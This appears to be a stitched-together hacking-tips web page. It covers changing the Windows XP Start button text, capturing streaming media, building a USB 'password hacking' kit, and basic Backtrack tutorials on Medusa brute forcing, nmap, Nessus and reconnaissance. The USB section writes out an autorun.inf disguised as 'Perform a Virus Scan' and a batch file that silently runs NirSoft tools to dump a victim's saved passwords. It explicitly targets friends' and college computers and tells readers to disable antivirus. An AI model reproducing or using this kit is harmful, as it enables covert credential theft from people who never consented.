BYPASS INTERNET CENSORSHIP.

READ THE BOOK AT BYPASS Internet censorship

Hack xp

Change text on XP Start Button

Step 1 - Modify Explorer.exe File

In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a special editor. For purposes of this article I have used Resource Hacker. Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Microsoft Windows 95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.

get this from h**p://delphi.icm.edu.pl/ftp/tools/ResHack.zip

The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe.

The category we are going to be using is "String Table". Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.

There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry. In my case I used Click Me!

You’ll notice that after the new text string has been entered the Compile Script button that was grayed out is now active. I won’t get into what’s involved in compiling a script, but suffice it to say it’s going to make this exercise worthwhile. Click Compile Script and then save the altered file using the Save As command on the File Menu. Do not use the Save command – Make sure to use the Save As command and choose a name for the file. Save the newly named file to C:\Windows.

Step 2 – Modify the Registry

!!!make a backup of your registry before making changes!!!

Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open field. Navigate to:

HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon

In the right pane, double click the "Shell" entry to open the Edit String dialog box. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.

Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.

Download any streaming file

HOW TO CAPTURE STREAMING MEDIA.

many websites (http://ww.smashits.com) stream songs and videos people believe they cannot be downloaded, quite why i dont know. they kinda think there is no file present to dwnld

once the file is located it can then be retrieved by nettransport nettransport is able to dwnld any file whether ftp or rtsp etc.

1. Download Project URL Snooper 1.02.01 from http://rain66.at.infoseek.co.jp/
2. Install URL Snooper (and WinPcap together)
3. Don't run URL Snooper when it is done installing
4. Restart computer
5. Open Project URL Snooper
6. Click on the General Options Tab
7. user posted image
8. Chose a network adapter
9. Now click on the search tab
10. Click Sniff Network
11. Go to a webpage and you should see some results in the results list
12. If nothing is appearing then chose another network adapter, until one works
13. Now you are ready to begin searching
14. Click the "Hide Non-Streaming URLs" option to hide all http:// references and only show URLs corresponding to streaming audio/video (rtsp, pnm, wma, etc.)
15. Then click Sniff Network
16. Your links should appear as you begin streaming your file
17. Select your desired stream user posted image
18. usually rm file user posted image
19. On the bottom there should be the link which you simply copy user posted image
20. Download nettransport from here :
    
    ftp://down_transport:123@s1.5fox.com/NT2Setup_multi.EXE or
    
    ftp://nettransport:nettransport@61.153.24...Setup_multi.EXE
    
    http://lycos26486.l97.lycos.com.cn/download.htm
    
    Or Just google it.
21. Install it
22. Click on new
23. Paste link

now you should be able to download any file if u need ne help jus ask i think dialups may have problems

Hack your friends password

How to hack passwords using USB Drive

Today I will show you how to hack Passwords using an USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc.

Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer.

We need the following tools to create our rootkit:

MessenPass : Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView :Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview :IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0

Protected Storage PassView:Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox:PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedre to create the password hacking toolkit: NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
   
   ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it:
   
   [autorun]
   
   open=launch.bat
   
   ACTION= Perform a Virus Scan
   
   save the Notepad and rename it from New Text Document.txt to autorun.inf Now copy theautorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it:
   
   start mspass.exe /stext mspass.txt
   
   start mailpv.exe /stext mailpv.txt
   
   start iepv.exe /stext iepv.txt
   
   start pspv.exe /stext pspv.txt
   
   start passwordfox.exe /stext passwordfox.txt
   
   

save the Notepad and rename it from New Text Document.txt to launch.bat Copy the launch.bat file also to your USB drive. Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP,Vista and 7

NOTE:This procedure will only recover the stored passwords (if any) on the Computer.

BACKTRACK TUTORIALS

Exploitation

Medusa

Medusa is a log-in brute forcer that attempts to gain access to remote services by guessing at the user password. Medusa is capable of attacking a large number of remote services including FTP, HTTP, MySQL, Telnet, VNC, Web Form, and more. In order to use Medusa, you need several pieces of information including the target IP address, a username or username list that you are attempting to log in as, a password or dictionary file containing multiple passwords to use when logging in, and the name of the service you are attempting to authenticate with.

Medusa comes installed on Backtrack 5. However, if you are using a different version of backtrack without Medusa type:

apt-get update

apt-get install medusa

When using online password crackers, the potential for success can be greatly

increased if you combine this attack with information gathered from reconnaissance and scanning. An example of this is when you find usernames, passwords, and email addresses. Programs like Medusa will take a username and password list and keep guessing until it uses all the passwords. Be aware that some remote access systems employ a password throttling technique that can limit the number of unsuccessful log-ins you are allowed. Your IP address can be blocked or the username can be locked out if you enter too many incorrect guesses.

Backtrack includes a few word lists that you can use for your brute forcing adventures. You can find one list at:

/pentest/passwords/wordlists/

n order to execute the brute-force attack, you open a terminal and type the following:

medusa –h target_ip –u username –P path_to_password_dictionary –M service_to_attack

“-h” is used to specify the IP address of the target host. The “-u” is used for a single username that Medusa will use to attempt log-ins. “-P” is used to specify an entire list containing multiple passwords. The “-P” needs to be followed by the actual location or path to the dictionary file. The “-M” switch is used to specify which service we want to attack.

More to come!

BACKTRACK TUTORIALS

SCANNING

The scanning process can be divided into three steps:

1. Determining if a system is active.
2. Port scanning the system.
3. Scanning the system for vulnerabilities.

Step 1 is the process of determining whether a target system is turned on and capable of communicating or interacting with our machine. This step is the least reliable and we should always continue with steps 2 and 3 regardless of the outcome of this test. Regardless, it is still important to conduct this step and make note of any machines that respond as alive.

Ports provide a way or location for software and networks to communicate with hardware like a computer. A port is a data connection that allows a computer to exchange information with other computers, software, or devices.

Common Ports and their Service

     Port                 Number Service 


     20                   FTP data transfer


     21                   FTP control


     22                   SSH


     23                   Telnet


     25                   SMTP (e-mail)


     53                   DNS


     80                   HTTP


     443                  HTTPS 

Pings and Ping Sweeps

A ping is a special type of network packet called an ICMP packet. Pings work by sending specific types of network traffic, called ICMP Echo Request packets, to a specific interface on a computer or network device. If the device (and the attached network card) that received the ping packet is turned on and not restricted from responding, the receiving machine will respond back to the originating machine with an Echo Reply packet. Aside from telling us that a host is alive and accepting traffic, pings provide other valuable information including the total time it took for the packet to travel to the target and return. Pings also report traffic loss that can be used to gauge the reliability of a network connection.

The simplest way to run a ping sweep is with a tool called FPing. FPing is built into Backtrack and is run from the terminal. The easiest way to run FPing is to open terminal window and type the following:

fping –a –g 172.16.45.1 172.16.45.254>hosts.txt

The “–a” argument is used to show only the live hosts in the output. This makes our final report much cleaner and easier to read. The “–g” is used to specify the range of IP addresses we want to sweep. You need to enter both the beginning and the ending IP addresses. In this example, we scanned all the IPs from 172.16.45.1 to 172.16.45.254. The “>” character is used to pipe the output to a file, and the hosts.txt is used to specify the name of the file our results will be saved to.

Port Scanning

There are a total of 65,536 (0–65,535) ports on every computer. Ports can be either TCP or UDP depending on the service using the port. We scan computers to see what ports are in use or “open”. This gives us a better picture of the purpose of the machine, which gives us a better idea about how to attack the box.

TCP 3-Way Handshake

Before we go on, we first have to know how computers on a network communicate with each other. When two computers want to communicate, they go through a processes known as the 3-way handshake. The first computer A will send a synchronize packet to the other computer B. Then, if computer B is listening (has its port open), it will respond back to A with a synchronize-acknowledgement packet. Finally, computer A will send an acknowledgement packet to computer B, and the two computers will communicate as usual.

Using Nmap

Nmap was written by Gordon Lyon and is available for free from www.insecure.org and is built into today’s Backtrack Linux 5.

Recommended Reading:Nmap Network Scanning

It is the official guide to using the nmap scanner. What more can I say? This book will cover nmap much more in depth than this site.

When we conduct a port scan, Nmap will create a packet and send it to each designated port on the computer just like the 3-way handshake. The goal is to determine what kind of a response we get from the target ports.

To use Nmap, open up the terminal and type:

nmap -p- 192.168.56.101

The “-p-” tells nmap to scan all ports on a target machine. The 10.0.2.15 is the local ip of the target machine.

Vulnerability Scanning

To scan systems for vulnerabilities, we will use a vulnerability scanner. There are several good scanners available, but we will be focusing on Nessus. To install Nessus type:

root@bt:~# apt-get install nessus

Then, to access Nessus via the GUI go to:

Applications -> Backtrack -> Vulnerability Assessment -> Vulnerability Scanner -> Nessus -> Nessus Start.

Reconnaissance

Penetration Testing Reconnaissance

We want to begin a pen test by reviewing the target’s website. We may actually use a tool called HTT rack to make a page-by-page copy of the website. HTT rack is a free program that creates an identical, off-line copy of the target website. The copied website will include all the pages, links, pictures, and code from the original website; however, it will reside on your local computer. Using a website copying tool like HTT rack allows us to explore and thoroughly mine the website “off-line” without having to spend additional time traipsing around on the company’s web server.

To install HTTrack open the console and type:

sudo apt-get install httrack

Once it is installed, begin HTTrack by typing httrack in the console:

Next, name your project whatever you want. Select a path where you want to save the off-line copy. I just left it as default (/home/websites). Just hit enter to leave it as such. Then enter the site you want to copy. I am using my own site since I will not get in trouble for copying it. (Please do not copy my site… Thanks!).

Pick an action you want. If you want to copy the site, press 1 then enter. HTTrack has a few options for you to pick from including a proxy to help cover your tracks. I am just using the basics for demonstration. I recommend you use a proxy when doing a real pen test.

After HTTrack finishes, you will have a complete off-line copy of the target site which you can review for information.

The Harvester

The Harvester is a simple Python script written by Christian Martorella at Edge Security. This tool allows us to quickly catalog both e-mail addresses and subdomains that are directly related to the target system.

The Harvester can be used to search Google, and Bing for e-mails, hosts, and subdomains. It can also search LinkedIn for user names.Often times you will find an email address, which could double as a login or user-name.

To use theHarvester first type in your console:

root@bt:~# cd /pentest/enumeration/theharvester

root@bt:~# ./theHarvester.py -d backtracktutorials.com -l 10 -b google.com

–d is used to specify the target domain.

A lowercase –l (that’s ‘L’ not a ’1′) is used to limit the number of results returned to us. In this case, the tool was instructed to return only 10 results. The –b is used to specify what public repository we want to search. We can choose among Google, Bing, PGP, or LinkedIn.